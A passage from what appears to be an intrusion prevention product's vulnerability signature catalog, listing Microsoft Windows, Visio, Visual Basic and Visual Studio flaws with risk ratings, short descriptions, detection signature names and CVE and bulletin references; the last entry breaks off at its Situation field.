https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2548

MS15-109
http://technet.microsoft.com/security/bulletin/MS15-109

Microsoft-TCP-IP-Denial-Of-Service-CVE-2021-24086

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1319-5242

Last changed:

sgpkg-ips-1319-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a denial of service vulnerability in the Microsoft TCP/IP stack.

Situation:

IPv6_Routing-header-type-unknown
IPv6_Option-misaligned
IPv6_Invalid-Type0-Routing-Header

References:

CVE-2021-24086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24086

ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb

Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24074

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1319-5242

Last changed:

sgpkg-ips-1319-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in the Microsoft TCP/IP stack.

Situation:

IP_Options-Malformed

References:

CVE-2021-24074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24074

ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb

Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24094

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1319-5242

Last changed:

sgpkg-ips-1319-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in the Microsoft TCP/IP stack.

Situation:

IPv6_Extension-headers-incomplete
IPv6_Atomic-Fragment

References:

CVE-2021-24094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24094

ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb

Microsoft-TCP-Timestamp-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows TCP/IP Stack

Risk:

High

First detected in:

sgpkg-ips-256-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Windows TCP/IP stack. The flaw is due to incorrect state information clean up by the TCP/IP stack when the TCP SYN flood prevention mode is on. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the target host while the target is being flooded with TCP SYN packets. Successful exploitation could potentially cause arbitrary code to be injected and executed in the security context of the System user. In this case, the behaviour of the target machine is dependent on the intention of the malicious code.

Situation:

TCP_Microsoft-Windows-Timestamp-Code-Execution

References:

CVE-2009-1925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1925

BID-36265
http://www.securityfocus.com/bid/36265

MS09-048
http://technet.microsoft.com/security/bulletin/MS09-048

Microsoft-Text-To-Speech-CVE-2018-8634

About this vulnerability:

A vulnerability in Microsoft Text To Speech

Risk:

Moderate

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Text To Speech

Situation:

File-Text_Microsoft-Text-To-Speech-CVE-2018-8634

References:

CVE-2018-8631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8631

Microsoft-Time-Remote-Code-Execution-CVE-2011-3397

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Text_Microsoft-Time-Remote-Code-Execution-CVE-2011-3397

References:

CVE-2011-3397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3397

MS11-090
http://technet.microsoft.com/security/bulletin/MS11-090

Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854

About this vulnerability:

A vulnerability in Microsoft Visual Basic for Applications

Risk:

High

First detected in:

sgpkg-ips-462-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Visual Basic for Applications

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Visual Basic for Applications.

Situation:

HTTP_CSU-Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854

References:

CVE-2012-1854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1854

BID-54303
http://www.securityfocus.com/bid/54303

OSVDB-83655
http://www.osvdb.org/83655

MS12-046
http://technet.microsoft.com/security/bulletin/MS12-046

Microsoft-VBA6-Stack-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Visual Basic for Applications

Risk:

High

First detected in:

sgpkg-ips-304-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Visual Basic for Applications.

Situation:

HTTP_SS-Microsoft-VBA6-Stack-Memory-Corruption
File-OLE_Microsoft-VBA6-Stack-Memory-Corruption

References:

CVE-2010-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0815

MS10-030
http://technet.microsoft.com/security/bulletin/MS10-030

Microsoft-VBScript-RCE-CVE-2018-8174

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Type Confusion

Description:

There is a remote code execution vulnerability in the Microsoft VBScript implementation.

Situation:

File-Text_Microsoft-VBScript-RCE-CVE-2018-8174
File-Text_Microsoft-VBScript-RCE-CVE-2018-8174-2

References:

CVE-2018-8174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-VBScript-Scripting-Engine-CVE-2014-6363

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft VBScript scripting engine

Risk:

Moderate

First detected in:

sgpkg-ips-620-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft VBScript scripting engine.

Situation:

File-Text_Microsoft-VBScript-Scripting-Engine-CVE-2014-6363

References:

CVE-2014-6363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6363

MS14-084
http://technet.microsoft.com/security/bulletin/MS14-084

Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Video

Risk:

High

First detected in:

sgpkg-ips-228-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft DirectShow. The flaw is due to the way Microsoft Video ActiveX Control parses image files. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability.

Situation:

HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow

References:

CVE-2008-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015

BID-35558
http://www.securityfocus.com/bid/35558

OSVDB-55651
http://www.osvdb.org/55651

MS09-032
http://technet.microsoft.com/security/bulletin/MS09-032

Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-248-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft DirectShow. The flaw is due to the way Microsoft Video ActiveX Control parses image files. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of memory corruption.

Situation:

HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
HTTP_SS-Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif
File-Binary_Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037

References:

CVE-2008-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015

BID-35558
http://www.securityfocus.com/bid/35558

OSVDB-55651
http://www.osvdb.org/55651

MS09-037
http://technet.microsoft.com/security/bulletin/MS09-037

Microsoft-Visio-DXF-File-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Visio

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio; Microsoft Office; Microsoft Office System

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the way Microsoft Visio handles specially-crafted DXF files. Remote attackers can exploit this vulnerability by enticing target users to open a specially crafted DXF file. Successful exploitation would result in injection and execution of arbitrary code in the context of currently logged-in user. Attempts that fail to execute injected code will likely result in denial of service conditions.

Situation:

HTTP_SS-Microsoft-Visio-DXF-File-Handling-Code-Execution
File-TextId_Microsoft-Visio-DXF-File-Handling-Code-Execution

References:

CVE-2008-1090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1090

BID-28556
http://www.securityfocus.com/bid/28556

MS08-019
http://technet.microsoft.com/security/bulletin/MS08-019

Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office Visio

Risk:

High

First detected in:

sgpkg-ips-304-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability Microsoft Visio. The vulnerability is due to a boundary error when parsing DXF files inserted into Visio documents. This vulnerability may be exploited by remote attackers by enticing a user to open a maliciously crafted Visio file with a vulnerable version of the application.

Situation:

HTTP_SS-Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
File-TextId_Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow

References:

CVE-2010-1681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1681

BID-39836
http://www.securityfocus.com/bid/39836

Microsoft-Visio-External-Entities-Resolution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Visio

Risk:

High

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio 2003; Microsoft Visio 2007; Microsoft Visio 2010

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Visio.

Situation:

File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability-2
File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability

References:

CVE-2013-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1301

MS13-044
http://technet.microsoft.com/security/bulletin/MS13-044

Microsoft-Visio-Insecure-Library-Loading-Vulnerability-CVE-2010-3148

About this vulnerability:

A vulnerability in Microsoft Visio

Risk:

High

First detected in:

sgpkg-ips-403-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio 2003

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Visio.

Situation:

HTTP_CSU-Microsoft-Visio-Insecure-Library-Loading-CVE-2010-3148

References:

CVE-2010-3148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3148

MS11-055
http://technet.microsoft.com/security/bulletin/MS11-055

Microsoft-Visio-Version-Number-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Visio

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio

Type:

Input Validation

Description:

There is a remote code-execution vulnerability in Microsoft Visio. The vulnerability is due to insufficient validating of user-supplied data while processing Version Number. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Microsoft Visio file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_Microsoft-Visio-Version-Number-Handling-Code-Execution
File-OLE_Microsoft-Visio-Version-Number-Handling-Code-Execution

References:

CVE-2007-0934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0934

BID-24349
http://www.securityfocus.com/bid/24349

OSVDB-35342
http://www.osvdb.org/35342

MS07-030
http://technet.microsoft.com/security/bulletin/MS07-030

Microsoft-Visio-Viewer-VSD-File-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office Visio Viewer

Risk:

High

First detected in:

sgpkg-ips-453-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio Viewer

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Visio Viewer. The vulnerability is due to the way the application performs validation on attributes when handling certain Visio files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious file with a vulnerable version of the application. This can lead to code execution in the context of the affected user.

Situation:

File-OLE_Microsoft-Visio-Viewer-VSD-File-Memory-Corruption

References:

CVE-2012-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0018

BID-53328
http://www.securityfocus.com/bid/53328

OSVDB-81731
http://www.osvdb.org/81731

MS12-031
http://technet.microsoft.com/security/bulletin/MS12-031

Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019

About this vulnerability:

Code execution vulnerability in Microsoft Visio Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio Viewer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Visio Viewer

Situation:

File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019

References:

CVE-2012-0019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0019

MS12-015
http://technet.microsoft.com/security/bulletin/MS12-015

Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0020

About this vulnerability:

Code execution vulnerability in Microsoft Visio Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1396-5242

Platform:

Windows

Software:

Microsoft Visio Viewer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Visio Viewer

References:

CVE-2012-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0020

OSVDB-79255
http://www.osvdb.org/79255

MS12-015
http://technet.microsoft.com/security/bulletin/MS12-015

Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136

About this vulnerability:

Code execution vulnerability in Microsoft Visio Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio Viewer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Visio Viewer

Situation:

File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136

References:

CVE-2012-0136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0136

MS12-015
http://technet.microsoft.com/security/bulletin/MS12-015

Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing

About this vulnerability:

Memory corruption vulnerability in Microsoft Visual Basic runtime

Risk:

High

First detected in:

sgpkg-ips-193-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Visual Basic

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in Microsoft Visual Basic runtime. An ActiveX control included in the runtime package suffers from a buffer overflow vulnerability when parsing AVI video files. A crafted AVI file may allow a remote attacker to execute arbitrary code in the context of the current user.

Situation:

HTTP_SS-Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
File-RIFF_Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing

References:

CVE-2008-4255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4255

BID-32613
http://www.securityfocus.com/bid/32613

MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070

Microsoft-Visual-Basic-Enterprise-Vb6stkit.dll-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Visual Basic

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Basic; Microsoft Visual Studio

Type:

Malfunction

Description:

There is a buffer overlfow vulnerability in the Vb6stkit.dll ActiveX control included with Microsoft Visual Basic. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page, potentially allowing arbitrary code to be executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF
File-TextId_Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF

References:

CVE-2008-2959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2959

BID-29792
http://www.securityfocus.com/bid/29792

Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Visual Basic (Runtime Extended Files)

Risk:

High

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Basic; Microsoft Visual FoxPro

Type:

Integer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Visual Basic runtime. The vulnerability is due to a boundary error in an animation ActiveX control while opening a specially crafted audio/video file. Remote attackers can exploit this vulnerability by enticing the target user to visit a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow

References:

CVE-2008-4254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4254

BID-32612
http://www.securityfocus.com/bid/32612

MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070

Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Visual Basic

Risk:

High

First detected in:

sgpkg-ips-196-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft FrontPage; Microsoft Project; Microsoft Visual Basic; Microsoft Visual FoxPro

Type:

Malfunction

Description:

There is a memory corruption vulnerability in the Microsoft Visual Basic runtime. The runtime is included in multiple Microsoft products. The runtime suffers improper memory initialization when the FlexGrid ActiveX control is loaded in a web page. Remote attackers can exploit this vulnerability by enticing the target user to visit a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption

References:

CVE-2008-4253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4253

BID-32592
http://www.securityfocus.com/bid/32592

MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070

Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-BOF

About this vulnerability:

A vulnerability in fpole library.

Risk:

High

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

Buffer overflow vulnerabilities exists in certain ActiveX controls used by Internet Explorer. The vulnerabilities are remotely exploitable. Vulnerabilities are explained in MS08-010. Fixes are also available from Microsoft.

Situation:

HTTP_SS-Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-4790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4790

BID-25571
http://www.securityfocus.com/bid/25571

MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010

Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection

About this vulnerability:

A vulnerability in Microsoft Visual Studio Code - Maven for Java

Risk:

Moderate

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1369-5242

Platform:

Windows

Software:

Microsoft Visual Studio Code

Type:

Input Validation

Description:

The Maven for Java Extension for Microsoft Visual Studio Code validates user input improperly, causing a command injection vulnerability. A successful attack allows an attacker to execute arbitrary commands with the privileges of the target process.

Situation:

File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection

References:

CVE-2021-28472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28472

Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Visual Studio Code

Risk:

Moderate

First detected in:

sgpkg-ips-1333-5242

Last changed:

sgpkg-ips-1333-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in the "Maven for Java" extension for Microsoft Visual Studio Code. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution

References:

CVE-2021-27084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27084

Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE

About this vulnerability:

A vulnerability in Code Remote - Containers.

Risk:

High

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Malfunction

Description:

A vulnerability in Microsoft Visual Studio Code Remote - Containers Extension, versions prior to 0.177.1, which allows remote attackers to execute arbitrary code by enticing a user to clone a malicious repository in a Docker volume, due a design weakness in how cloning a repository in a Docker volume can allow code execution from that repository without the user being aware.

Situation:

HTTP_CS-Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE

References:

CVE-2021-31213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31213

Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Visual Studio Code Remote - Containers Extension

Risk:

Moderate

First detected in:

sgpkg-ips-1334-5242

Last changed:

sgpkg-ips-1334-5242

Platform:

Windows

Software:

Microsoft Visual Studio Code

Type:

Malfunction

Description:

Insufficient validation of the configuration of the Remote Containers Extension causes a remote code execution vulnerability in Microsoft Visual Studio Code. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
File-Member-Name_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution

References:

CVE-2021-27083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27083

Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Visual Studio

Risk:

High

First detected in:

sgpkg-ips-1521-5242

Last changed:

sgpkg-ips-1521-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in Microsoft Visual Studio. The vulnerability is due to improper handling of DDS files. A remote attacker can exploit these vulnerabilities by enticing a target user into opening a crafted DDS file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-Binary_Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow

References:

CVE-2021-36952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36952

ms21-sep
http://technet.microsoft.com/security/bulletin/ms21-sep

Microsoft-Visual-Studio-MFC-Insecure-Library-Loading

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Visual Studio detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Microsoft Visual Studio

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Visual Studio Foundation Classes (MFC). The vulnerability is due to a design weakness when MFC attempts to load a specific DLL upon running an MFC-compiled executable.

Situation:

SMB-TCP_CHS_Microsoft-Visual-Studio-MFC-Insecure-Library-Loading

References:

CVE-2010-3190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3190

MS11-025
http://technet.microsoft.com/security/bulletin/MS11-025

Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF

About this vulnerability:

Buffer overflow vulnerability in the Microsoft Visual Studio Msmask32.ocx ActiveX control

Risk:

High

First detected in:

sgpkg-ips-171-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Buffer Overflow

Description:

There is a buffer overflow in the Microsoft Visual Studio Msmask32.ocx ActiveX control. The vulnerability is due to a boundary error while handling an excessively long string assigned to the Mask property. A remote attacker can exploit the vulnerability by enticing a user to visit a malicious web page. Successful exploitation leads to a termination of Internet Explorer or non-privileged arbitrary code execution.

Situation:

HTTP_SS-Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
File-Text_Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF

References:

CVE-2008-3704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3704

BID-30674
http://www.securityfocus.com/bid/30674

OSVDB-47475
http://www.osvdb.org/47475

MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070

Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Visual Studio and Visual Basic

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Basic; Microsoft Visual Studio

Type:

Malfunction

Description:

There is an access control weakness vulnerability in the PDWizard ActiveX control included with Microsoft Visual Basic and Visual Studio. The vulnerability is the result of insufficient data validation while processing the StartProcess method call from a script embedded into a web page. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page, potentially allowing arbitrary code to be executed in the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution

References:

CVE-2007-4891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4891

BID-25638
http://www.securityfocus.com/bid/25638

OSVDB-37106
http://www.osvdb.org/37106

Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Visual Basic and Visual Studio

Risk:

High

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Basic; Microsoft Visual Studio

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Microsoft's ActiveX control pdwizard.ocx, distributed with Microsoft Visual Studio and Microsoft Visual Basic. The vulnerability is due to memory corruption that occurs when the affected control is instantiated in Internet Explorer. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption

References:

CVE-2007-3041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3041

BID-25295
http://www.securityfocus.com/bid/25295

OSVDB-36395
http://www.osvdb.org/36395

MS07-045
http://technet.microsoft.com/security/bulletin/MS07-045

Microsoft-Visual-Studio-Project-Name-BOF

About this vulnerability:

A buffer overflow vulnerability in Microsoft Visual Studio

Risk:

High

First detected in:

sgpkg-ips-214-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Buffer Overflow

Description:

There exists a stack based buffer overflow vulnerability in Microsoft Visual Studio. The flaw is caused by improper boundary checks when processing overly long project name strings contained in Database Project (.dbp) files and Solution (.sln) files. An attacker exploiting this vulnerability can inject and execute arbitrary code within the security context of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Visual-Studio-Project-Name-BOF
File-TextId_Microsoft-Visual-Studio-Project-Name-BOF

References:

CVE-2006-1043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1043

BID-16953
http://www.securityfocus.com/bid/16953

OSVDB-23711
http://www.osvdb.org/23711

Microsoft-Visual-Studio-Python-Interpreter-RCE

About this vulnerability:

A vulnerability in Microsoft Visual Studio.

Risk:

High

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Windows

Software:

Microsoft Visual Studio

Type:

Insecure Configuration

Description:

A vulnerability in Microsoft Visual Studio 2019, versions prior to 16.9.5, which allows remote attackers to execute remote code by sending a malicious project/workspace with a specially crafted python.exe file in a subdirectory.

Situation:

File-Zip_Microsoft-Visual-Studio-Python-Interpreter-RCE

References:

CVE-2021-27068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27068

Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Visual Studio Team Web Access console

Risk:

High

First detected in:

sgpkg-ips-476-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Studio 2010

Type:

Code Injection

Description:

There is a vulnerability in Microsoft Visual Studio Web access console.

Situation:

